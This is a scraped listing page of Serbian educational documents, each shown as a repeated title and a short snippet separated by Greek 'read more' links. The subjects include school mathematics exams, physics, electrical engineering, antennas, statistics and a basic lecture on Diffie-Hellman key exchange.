Διαβάστε περισσότερα

Tестирање хипотеза. 5.час. 30. март Боjана Тодић Статистички софтвер март / 10

Tестирање хипотеза. 5.час. 30. март Боjана Тодић Статистички софтвер март / 10 Tестирање хипотеза 5.час 30. март 2016. Боjана Тодић Статистички софтвер 2 30. март 2016. 1 / 10 Монте Карло тест Монте Карло методе су методе код коjих се употребљаваjу низови случаjних броjева за извршење

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 013/014. година ТЕСТ

Διαβάστε περισσότερα

b) Израз за угиб дате плоче, ако се користи само први члан реда усвојеног решења, је:

b) Израз за угиб дате плоче, ако се користи само први члан реда усвојеног решења, је: Пример 1. III Савијање правоугаоних плоча За правоугаону плочу, приказану на слици, одредити: a) израз за угиб, b) вредност угиба и пресечних сила у тачки 1 ако се користи само први члан реда усвојеног

Διαβάστε περισσότερα

ТРАПЕЗ РЕГИОНАЛНИ ЦЕНТАР ИЗ ПРИРОДНИХ И ТЕХНИЧКИХ НАУКА У ВРАЊУ. Аутор :Петар Спасић, ученик 8. разреда ОШ 8. Октобар, Власотинце

ТРАПЕЗ РЕГИОНАЛНИ ЦЕНТАР ИЗ ПРИРОДНИХ И ТЕХНИЧКИХ НАУКА У ВРАЊУ. Аутор :Петар Спасић, ученик 8. разреда ОШ 8. Октобар, Власотинце РЕГИОНАЛНИ ЦЕНТАР ИЗ ПРИРОДНИХ И ТЕХНИЧКИХ НАУКА У ВРАЊУ ТРАПЕЗ Аутор :Петар Спасић, ученик 8. разреда ОШ 8. Октобар, Власотинце Ментор :Криста Ђокић, наставник математике Власотинце, 2011. године Трапез

Διαβάστε περισσότερα

5.2. Имплицитни облик линеарне функције

5.2. Имплицитни облик линеарне функције математикa за VIII разред основне школе 0 Слика 6 8. Нацртај график функције: ) =- ; ) =,5; 3) = 0. 9. Нацртај график функције и испитај њен знак: ) = - ; ) = 0,5 + ; 3) =-- ; ) = + 0,75; 5) = 0,5 +. 0.

Διαβάστε περισσότερα

Количина топлоте и топлотна равнотежа

Количина топлоте и топлотна равнотежа Количина топлоте и топлотна равнотежа Топлота и количина топлоте Топлота је један од видова енергије тела. Енергија коју тело прими или отпушта у топлотним процесима назива се количина топлоте. Количина

Διαβάστε περισσότερα

3.1. Однос тачке и праве, тачке и равни. Одређеност праве и равни

3.1. Однос тачке и праве, тачке и равни. Одређеност праве и равни ТАЧКА. ПРАВА. РАВАН Талес из Милета (624 548. пре н. е.) Еуклид (330 275. пре н. е.) Хилберт Давид (1862 1943) 3.1. Однос тачке и праве, тачке и равни. Одређеност праве и равни Настанак геометрије повезује

Διαβάστε περισσότερα

СИСТЕМ ЛИНЕАРНИХ ЈЕДНАЧИНА С ДВЕ НЕПОЗНАТЕ

СИСТЕМ ЛИНЕАРНИХ ЈЕДНАЧИНА С ДВЕ НЕПОЗНАТЕ СИСТЕМ ЛИНЕАРНИХ ЈЕДНАЧИНА С ДВЕ НЕПОЗНАТЕ 8.. Линеарна једначина с две непознате Упознали смо појам линеарног израза са једном непознатом. Изрази x + 4; (x 4) + 5; x; су линеарни изрази. Слично, линеарни

Διαβάστε περισσότερα

Динамика. Описује везу између кретања објекта и сила које делују на њега. Закони класичне динамике важе:

Динамика. Описује везу између кретања објекта и сила које делују на њега. Закони класичне динамике важе: Њутнови закони 1 Динамика Описује везу између кретања објекта и сила које делују на њега. Закони класичне динамике важе: када су објекти довољно велики (>димензија атома) када се крећу брзином много мањом

Διαβάστε περισσότερα

Антене и простирање. Показна лабораторијска вежба - мерење карактеристика антена. 1. Антене - намена и својства

Антене и простирање. Показна лабораторијска вежба - мерење карактеристика антена. 1. Антене - намена и својства Антене и простирање Показна лабораторијска вежба - мерење карактеристика антена 1. Антене - намена и својства Антена је склоп који претвара вођени електромагнетски талас у електромагнетски талас у слободном

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 01/01. година ТЕСТ

Διαβάστε περισσότερα

ВИСОКА ШКОЛА ЕЛЕКТРОТЕХНИКЕ И РАЧУНАРСТВА СТРУКОВНИХ СТУДИЈА. Стефановић Ивана МОДЕЛИ ПРОПАГАЦИЈЕ СИГНАЛА У МОБИЛНИМ ТЕЛЕКОМУНИКАЦИОНИМ СИСТЕМИМА

ВИСОКА ШКОЛА ЕЛЕКТРОТЕХНИКЕ И РАЧУНАРСТВА СТРУКОВНИХ СТУДИЈА. Стефановић Ивана МОДЕЛИ ПРОПАГАЦИЈЕ СИГНАЛА У МОБИЛНИМ ТЕЛЕКОМУНИКАЦИОНИМ СИСТЕМИМА ВИСОКА ШКОЛА ЕЛЕКТРОТЕХНИКЕ И РАЧУНАРСТВА СТРУКОВНИХ СТУДИЈА Стефановић Ивана МОДЕЛИ ПРОПАГАЦИЈЕ СИГНАЛА У МОБИЛНИМ ТЕЛЕКОМУНИКАЦИОНИМ СИСТЕМИМА -завршни рад- Београд,010 Кандидат: Стефановић Ивана Број

Διαβάστε περισσότερα

Теорија електричних кола

Теорија електричних кола Др Милка Потребић, ванредни професор, Теорија електричних кола, вежбе, Универзитет у Београду Електротехнички факултет, 7. Теорија електричних кола Милка Потребић Др Милка Потребић, ванредни професор,

Διαβάστε περισσότερα

Ваљак. cm, а површина осног пресека 180 cm. 252π, 540π,... ТРЕБА ЗНАТИ: ВАЉАК P=2B + M V= B H B= r 2 p M=2rp H Pосн.пресека = 2r H ЗАДАЦИ:

Ваљак. cm, а површина осног пресека 180 cm. 252π, 540π,... ТРЕБА ЗНАТИ: ВАЉАК P=2B + M V= B H B= r 2 p M=2rp H Pосн.пресека = 2r H ЗАДАЦИ: Ваљак ВАЉАК P=B + M V= B H B= r p M=rp H Pосн.пресека = r H. Површина омотача ваљка је π m, а висина ваљка је два пута већа од полупрчника. Израчунати запремину ваљка. π. Осни пресек ваљка је квадрат површине

Διαβάστε περισσότερα

Универзитет у Београду, Саобраћајни факултет Предмет: Паркирање. 1. вежба

Универзитет у Београду, Саобраћајни факултет Предмет: Паркирање. 1. вежба Универзитет у Београду, Саобраћајни факултет Предмет: Паркирање ОРГАНИЗАЦИЈА ПАРКИРАЛИШТА 1. вежба Место за паркирање (паркинг место) Део простора намењен, технички опремљен и уређен за паркирање једног

Διαβάστε περισσότερα

Упутство за избор домаћих задатака

Упутство за избор домаћих задатака Упутство за избор домаћих задатака Студент од изабраних задатака области Математике 2: Комбинаторика, Вероватноћа и статистика бира по 20 задатака. Студент може бирати задатке помоћу програмског пакета

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Тест Математика Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 00/0. година ТЕСТ МАТЕМАТИКА

Διαβάστε περισσότερα

6.1. Осна симетрија у равни. Симетричност двеју фигура у односу на праву. Осна симетрија фигуре

6.1. Осна симетрија у равни. Симетричност двеју фигура у односу на праву. Осна симетрија фигуре 0 6.. Осна симетрија у равни. Симетричност двеју фигура у односу на праву. Осна симетрија фигуре У обичном говору се често каже да су неки предмети симетрични. Примери таквих објеката, предмета, геометријских

Διαβάστε περισσότερα

ЛИНЕАРНА ФУНКЦИЈА. k, k 0), осна и централна симетрија и сл. 2, x 0. У претходном примеру неке функције су линеарне а неке то нису.

ЛИНЕАРНА ФУНКЦИЈА. k, k 0), осна и централна симетрија и сл. 2, x 0. У претходном примеру неке функције су линеарне а неке то нису. ЛИНЕАРНА ФУНКЦИЈА 5.. Функција = a + b Функционалне зависности су веома значајне и са њиховим применама често се сусрећемо. Тако, већ су нам познате директна и обрнута пропорционалност ( = k; = k, k ),

Διαβάστε περισσότερα

Разлика потенцијала није исто што и потенцијална енергија. V = V B V A = PE / q

Разлика потенцијала није исто што и потенцијална енергија. V = V B V A = PE / q Разлика потенцијала Разлика потенцијала између тачака A и B се дефинише као промена потенцијалне енергије (крајња минус почетна вредност) када се наелектрисање q помера из тачке A утачку B подељена са

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 011/01. година ТЕСТ МАТЕМАТИКА УПУТСТВО

Διαβάστε περισσότερα

Смер: Друмски саобраћај. Висока техничка школа струковних студија у Нишу ЕЛЕКТРОТЕХНИКА СА ЕЛЕКТРОНИКОМ

Смер: Друмски саобраћај. Висока техничка школа струковних студија у Нишу ЕЛЕКТРОТЕХНИКА СА ЕЛЕКТРОНИКОМ Испит из предмета Електротехника са електроником 1. Шест тачкастих наелектрисања Q 1, Q, Q, Q, Q 5 и Q налазе се у теменима правилног шестоугла, као на слици. Познато је: Q1 = Q = Q = Q = Q5 = Q ; Q 1,

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ У ОСНОВНОМ ОБРАЗОВАЊУ И ВАСПИТАЊУ школска 014/01. година ТЕСТ МАТЕМАТИКА

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ПРОБНИ ЗАВРШНИ ИСПИТ школска 016/017. година ТЕСТ МАТЕМАТИКА УПУТСТВО ЗА ПРЕГЛЕДАЊЕ

Διαβάστε περισσότερα

I Тачка 1. Растојање две тачке: 2. Средина дужи y ( ) ( ) 2. II Права 1. Једначина прамена правих 2. Једначина праве кроз две тачке ( )

I Тачка 1. Растојање две тачке: 2. Средина дужи y ( ) ( ) 2. II Права 1. Једначина прамена правих 2. Једначина праве кроз две тачке ( ) Шт треба знати пре почетка решавања задатака? АНАЛИТИЧКА ГЕОМЕТРИЈА У РАВНИ I Тачка. Растојање две тачке:. Средина дужи + ( ) ( ) + S + S и. Деоба дужи у односу λ: 4. Површина троугла + λ + λ C + λ и P

Διαβάστε περισσότερα

4.4. Паралелне праве, сечица. Углови које оне одређују. Углови са паралелним крацима

4.4. Паралелне праве, сечица. Углови које оне одређују. Углови са паралелним крацима 50. Нацртај било које унакрсне углове. Преношењем утврди однос унакрсних углова. Какво тврђење из тога следи? 51. Нацртај угао чија је мера 60, а затим нацртај њему унакрсни угао. Колика је мера тог угла?

Διαβάστε περισσότερα

Школска 2010/2011 ДОКТОРСКЕ АКАДЕМСКЕ СТУДИЈЕ

Школска 2010/2011 ДОКТОРСКЕ АКАДЕМСКЕ СТУДИЈЕ Школска 2010/2011 ДОКТОРСКЕ АКАДЕМСКЕ СТУДИЈЕ Прва година ИНФОРМАТИЧКЕ МЕТОДЕ У БИОМЕДИЦИНСКИМ ИСТРАЖИВАЊИМА Г1: ИНФОРМАТИЧКЕ МЕТОДЕ У БИОМЕДИЦИНСКИМ ИСТРАЖИВАЊИМА 10 ЕСПБ бодова. Недељно има 20 часова

Διαβάστε περισσότερα

Штампарске грешке у петом издању уџбеника Основи електротехнике, 1. део, Електростатика

Штампарске грешке у петом издању уџбеника Основи електротехнике, 1. део, Електростатика Штампарске грешке у петом издању уџбеника Основи електротехнике део Страна пасус први ред треба да гласи У четвртом делу колима променљивих струја Штампарске грешке у четвртом издању уџбеника Основи електротехнике

Διαβάστε περισσότερα

Закони термодинамике

Закони термодинамике Закони термодинамике Први закон термодинамике Први закон термодинамике каже да додавање енергије систему може бити утрошено на: Вршење рада Повећање унутрашње енергије Први закон термодинамике је заправо

Διαβάστε περισσότερα

2.3. Решавање линеарних једначина с једном непознатом

2.3. Решавање линеарних једначина с једном непознатом . Решимо једначину 5. ( * ) + 5 + Провера: + 5 + 0 5 + 5 +. + 0. Број је решење дате једначине... Реши једначину: ) +,5 ) + ) - ) - -.. Да ли су следеће једначине еквивалентне? Провери решавањем. ) - 0

Διαβάστε περισσότερα

Теорија електричних кола

Теорија електричних кола Др Милка Потребић, ванредни професор, Теорија електричних кола, предавања, Универзитет у Београду Електротехнички факултет, 07. Вишефазне електричне системе је патентирао српски истраживач Никола Тесла

Διαβάστε περισσότερα

ЗАШТИТА ПОДАТАКА Шифровање јавним кључем и хеш функције. Diffie-Hellman размена кључева

ЗАШТИТА ПОДАТАКА Шифровање јавним кључем и хеш функције. Diffie-Hellman размена кључева ЗАШТИТА ПОДАТАКА Шифровање јавним кључем и хеш функције Diffie-Hellman размена кључева Преглед Биће објашњено: Diffie-Hellman размена кључева 2/13 Diffie-Hellman размена кључева први алгоритам са јавним

Διαβάστε περισσότερα

Теорија линеарних антена

Теорија линеарних антена Теорија линеарних антена Антене су уређаји који претварају електричну енергију у електромагнетну (предајне антене) и обрнуто (пријемне антене) Према фреквентном опсегу, антене се деле на каналске (за узан

Διαβάστε περισσότερα

РЕШЕЊА ЗАДАТАКА - IV РАЗЕД 1. Мањи број: : x,

РЕШЕЊА ЗАДАТАКА - IV РАЗЕД 1. Мањи број: : x, РЕШЕЊА ЗАДАТАКА - IV РАЗЕД 1. Мањи број: : x, Већи број: 1 : 4x + 1, (4 бода) Њихов збир: 1 : 5x + 1, Збир умањен за остатак: : 5x = 55, 55 : 5 = 11; 11 4 = ; + 1 = 45; : x = 11. Дакле, први број је 45

Διαβάστε περισσότερα

8.5 ЛАБОРАТОРИЈСКА ВЕЖБА 5 Задатак вежбе: PI регулација брзине напонски управљаним микромотором једносмерне струје

8.5 ЛАБОРАТОРИЈСКА ВЕЖБА 5 Задатак вежбе: PI регулација брзине напонски управљаним микромотором једносмерне струје Регулација електромоторних погона 8.5 ЛАБОРАТОРИЈСКА ВЕЖБА 5 Задатак вежбе: регулација брзине напонски управљаним микромотором једносмерне струје Увод Simulik модел На основу упрошћеног блок дијаграма

Διαβάστε περισσότερα

Први корак у дефинисању случајне променљиве је. дефинисање и исписивање свих могућих eлементарних догађаја.

Први корак у дефинисању случајне променљиве је. дефинисање и исписивање свих могућих eлементарних догађаја. СЛУЧАЈНА ПРОМЕНЉИВА Једнодимензионална случајна променљива X је пресликавање у коме се сваки елементарни догађај из простора елементарних догађаја S пресликава у вредност са бројне праве Први корак у дефинисању

Διαβάστε περισσότερα

ПОВРШИНа ЧЕТВОРОУГЛОВА И ТРОУГЛОВА

ПОВРШИНа ЧЕТВОРОУГЛОВА И ТРОУГЛОВА ПОВРШИНа ЧЕТВОРОУГЛОВА И ТРОУГЛОВА 1. Допуни шта недостаје: а) 5m = dm = cm = mm; б) 6dm = m = cm = mm; в) 7cm = m = dm = mm. ПОЈАМ ПОВРШИНЕ. Допуни шта недостаје: а) 10m = dm = cm = mm ; б) 500dm = a

Διαβάστε περισσότερα

Флукс, електрична енергија, електрични потенцијал

Флукс, електрична енергија, електрични потенцијал Флукс, електрична енергија, електрични потенцијал 1 Електрични флукс Ако линије поља пролазе кроз површину A која је нормална на њих Производ EA је флукс, Φ Генерално: Φ E = E A cos θ 2 Електрични флукс,

Διαβάστε περισσότερα

Универзитет у Крагујевцу Факултет за машинство и грађевинарство у Краљеву Катедра за основне машинске конструкције и технологије материјала

Универзитет у Крагујевцу Факултет за машинство и грађевинарство у Краљеву Катедра за основне машинске конструкције и технологије материјала Теоријски део: Вежба број ТЕРМИЈСКА AНАЛИЗА. Термијска анализа је поступак који је 903.год. увео G. Tamman за добијање криве хлађења(загревања). Овај поступак заснива се на принципу промене топлотног садржаја

Διαβάστε περισσότερα

РЈЕШЕЊА ЗАДАТАКА СА ТАКМИЧЕЊА ИЗ ЕЛЕКТРИЧНИХ МАШИНА Електријада 2004

РЈЕШЕЊА ЗАДАТАКА СА ТАКМИЧЕЊА ИЗ ЕЛЕКТРИЧНИХ МАШИНА Електријада 2004 РЈЕШЕЊА ЗАДАТАКА СА ТАКМИЧЕЊА ИЗ ЕЛЕКТРИЧНИХ МАШИНА Електријада 004 ТРАНСФОРМАТОРИ Tрофазни енергетски трансформатор 100 VA има напон и реактансу кратког споја u 4% и x % респективно При номиналном оптерећењу

Διαβάστε περισσότερα

Факултет организационих наука Центар за пословно одлучивање. PROMETHEE (Preference Ranking Organization Method for Enrichment Evaluation)

Факултет организационих наука Центар за пословно одлучивање. PROMETHEE (Preference Ranking Organization Method for Enrichment Evaluation) Факултет организационих наука Центар за пословно одлучивање PROMETHEE (Preference Ranking Organization Method for Enrichment Evaluation) Студија случаја D-Sight Консултантске услуге за Изградња брзе пруге

Διαβάστε περισσότερα

Слика 1. Слика 1.1 Слика 1.2 Слика 1.3. Количина електрицитета која се налази на електродама кондензатора капацитивности C 3 је:

Слика 1. Слика 1.1 Слика 1.2 Слика 1.3. Количина електрицитета која се налази на електродама кондензатора капацитивности C 3 је: Три кондензатора познатих капацитивности 6 nf nf и nf везани су као на слици и прикључени на напон U Ако је позната количина наелектрисања на кондензатору капацитивности одредити: а) Напон на који је прикључена

Διαβάστε περισσότερα

ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ

ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ предмет: МЕХАНИКА 1 студијски програми: ЗАШТИТА ЖИВОТНЕ СРЕДИНЕ И ПРОСТОРНО ПЛАНИРАЊЕ ПРЕДАВАЊЕ БРОЈ 3. 1 Садржај предавања: Статичка одређеност задатака

Διαβάστε περισσότερα

2. EЛЕМЕНТАРНЕ ДИОФАНТОВЕ ЈЕДНАЧИНЕ

2. EЛЕМЕНТАРНЕ ДИОФАНТОВЕ ЈЕДНАЧИНЕ 2. EЛЕМЕНТАРНЕ ДИОФАНТОВЕ ЈЕДНАЧИНЕ 2.1. МАТЕМАТИЧКИ РЕБУСИ Најједноставније Диофантове једначине су математички ребуси. Метод разликовања случајева код ових проблема се показује плодоносним, јер је раздвајање

Διαβάστε περισσότερα

8.2 ЛАБОРАТОРИЈСКА ВЕЖБА 2 Задатак вежбе: Израчунавање фактора појачања мотора напонским управљањем у отвореној повратној спрези

8.2 ЛАБОРАТОРИЈСКА ВЕЖБА 2 Задатак вежбе: Израчунавање фактора појачања мотора напонским управљањем у отвореној повратној спрези Регулциј електромоторних погон 8 ЛАБОРАТОРИЈСКА ВЕЖБА Здтк вежбе: Изрчунвње фктор појчњ мотор нпонским упрвљњем у отвореној повртној спрези Увод Преносн функциј мотор којим се нпонски упрвљ Кд се з нулте

Διαβάστε περισσότερα

Аксиоме припадања. Никола Томовић 152/2011

Аксиоме припадања. Никола Томовић 152/2011 Аксиоме припадања Никола Томовић 152/2011 Павле Васић 104/2011 1 Шта је тачка? Шта је права? Шта је раван? Да бисмо се бавили геометријом (и не само геометријом), морамо увести основне појмове и полазна

Διαβάστε περισσότερα

ЛАБОРАТОРИЈСКЕ ВЕЖБЕ ИЗ ФИЗИКЕ ПРВИ КОЛОКВИЈУМ I група

ЛАБОРАТОРИЈСКЕ ВЕЖБЕ ИЗ ФИЗИКЕ ПРВИ КОЛОКВИЈУМ I група ЛАБОРАТОРИЈСКЕ ВЕЖБЕ ИЗ ФИЗИКЕ ПРВИ КОЛОКВИЈУМ 21.11.2009. I група Име и презиме студента: Број индекса: Термин у ком студент ради вежбе: Напомена: Бира се и одговара ИСКЉУЧИВО на шест питања заокруживањем

Διαβάστε περισσότερα

L кплп (Калем у кплу прпстпперипдичне струје)

L кплп (Калем у кплу прпстпперипдичне струје) L кплп (Калем у кплу прпстпперипдичне струје) i L u=? За коло са слике кроз калем ппзнате позната простопериодична струја: индуктивности L претпоставићемо да протиче i=i m sin(ωt + ψ). Услед променљиве

Διαβάστε περισσότερα

Писмени испит из Теорије површинских носача. 1. За континуалну плочу приказану на слици одредити угиб и моменте савијања у означеним тачкама.

Писмени испит из Теорије површинских носача. 1. За континуалну плочу приказану на слици одредити угиб и моменте савијања у означеним тачкама. Београд, 24. јануар 2012. 1. За континуалну плочу приказану на слици одредити угиб и моменте савијања у означеним тачкама. dpl = 0.2 m P= 30 kn/m Линијско оптерећење се мења по синусном закону: 2. За плочу

Διαβάστε περισσότερα

ИНФОРМАТИКА У ЗДРАВСТВУ

ИНФОРМАТИКА У ЗДРАВСТВУ ИНФОРМАТИКА У ЗДРАВСТВУ ОСНОВНЕ СТРУКОВНЕ СТУДИЈЕ СТРУКОВНА МЕДИЦИНСКА СЕСТРА СТРУКОВНИ ФИЗИОТЕРАПЕУТ ДРУГА ГОДИНА СТУДИЈА школска 2017/2018. Предмет: ИНФОРМАТИКА У ЗДРАВСТВУ Предмет се вреднује са 3

Διαβάστε περισσότερα

2.1. Права, дуж, полуправа, раван, полураван

2.1. Права, дуж, полуправа, раван, полураван 2.1. Права, дуж, полуправа, раван, полураван Човек је за своје потребе градио куће, школе, путеве и др. Слика 1. Слика 2. Основа тих зграда је често правоугаоник или сложенија фигура (слика 3). Слика 3.

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 2011/2012. година ТЕСТ 3 МАТЕМАТИКА УПУТСТВО

Διαβάστε περισσότερα

Вежба 8. Мерење нивоа пријемних сигнала код земаљске и сателитске ТВ дифузије

Вежба 8. Мерење нивоа пријемних сигнала код земаљске и сателитске ТВ дифузије Вежба 8: Мерење нивоа пријемних сигнала код земаљске и сателитске ТВ дифузије 1. Циљ вежбе У оквиру ове вежбе, студент ће се упознати са: а) фреквенцијским опсезима земаљских, сателитских и КДС сигнала,

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ И НАУКЕ ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ НА КРАЈУ ОСНОВНОГ ОБРАЗОВАЊА И ВАСПИТАЊА школска 2010/2011. година ТЕСТ 3 МАТЕМАТИКА УПУТСТВО

Διαβάστε περισσότερα

АНАЛИТИЧКА ГЕОМЕТРИЈА. - удаљеност између двије тачке. 1 x2

АНАЛИТИЧКА ГЕОМЕТРИЈА. - удаљеност између двије тачке. 1 x2 АНАЛИТИЧКА ГЕОМЕТРИЈА d AB x x y - удаљеност између двије тачке y x x x y s, y y s - координате средишта дужи x x y x, y y - подјела дужи у заданом односу x x x y y y xt, yt - координате тежишта троугла

Διαβάστε περισσότερα

8. ПИТАГОРИНА ЈЕДНАЧИНА х 2 + у 2 = z 2

8. ПИТАГОРИНА ЈЕДНАЧИНА х 2 + у 2 = z 2 8. ПИТАГОРИНА ЈЕДНАЧИНА х + у = z Један од најзанимљивијих проблема теорије бројева свакако је проблем Питагориних бројева, тј. питање решења Питагорине Диофантове једначине. Питагориним бројевима или

Διαβάστε περισσότερα

Једна од централних идеја рачунарства Метода која решавање проблема своди на решавање проблема мање димензије

Једна од централних идеја рачунарства Метода која решавање проблема своди на решавање проблема мање димензије Рекурзија Једна од централних идеја рачунарства Метода која решавање проблема своди на решавање проблема мање димензије Рекурзивна функција (неформално) је функција која у својој дефиницији има позив те

Διαβάστε περισσότερα

КВАЛИФИКАЦИОНИ ИСПИТ ИЗ ФИЗИКЕ ЗА УПИС НА САОБРАЋАЈНИ ФАКУЛТЕТ ЈУН год.

КВАЛИФИКАЦИОНИ ИСПИТ ИЗ ФИЗИКЕ ЗА УПИС НА САОБРАЋАЈНИ ФАКУЛТЕТ ЈУН год. КВАЛИФИКАЦИОНИ ИСПИТ ИЗ ФИЗИКЕ ЗА УПИС НА САОБРАЋАЈНИ ФАКУЛТЕТ ЈУН 7. год. Тест има задатака. Време за рад је 8 минута. Задаци са редним бројем -6 вреде по поена задаци 7- вреде по 5 поена задаци 5- вреде

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ЗАВРШНИ ИСПИТ У ОСНОВНОМ ОБРАЗОВАЊУ И ВАСПИТАЊУ школска 0/06. година ТЕСТ МАТЕМАТИКА

Διαβάστε περισσότερα

